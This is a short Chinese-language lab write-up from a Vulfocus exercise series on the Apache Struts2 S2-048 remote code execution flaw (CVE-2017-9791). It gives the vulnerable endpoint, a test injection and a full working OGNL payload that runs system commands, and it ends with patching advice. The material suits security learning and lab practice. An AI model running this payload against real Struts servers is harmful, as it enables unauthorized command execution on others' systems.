[Vulfocus解题系列]struts2-048 远程代码执行 （CVE-2017-9791）

漏洞介绍

名称: struts2-048 远程代码执行 （CVE-2017-9791）

描述: Apache Struts是美国阿帕奇（Apache）软件基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。 当Struts 2中的Struts 1插件启用的情况下，攻击者通过构造恶意字段可以造成RCE

解题过程

1.打开靶场环境

2.访问漏洞存在的路径 /integration/saveGangster.action

3.在第一个框里输入 ${1+1}进行测试，下面两个框随便填

4.发现1+1被执行了

5.构建命令执行的pyload,执行命令为id

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

可以看到id被成功执行

6.pwd命令也可以执行成功

7.不知道为什么，ls /tmp执行不了,会报错,暂时没找到获得falg的方法。

修复建议

1.升级建议升级到最新版本

2.根据业务情况，禁用关闭(删除) \struts-2.3.x\apps\struts2-showcase.war包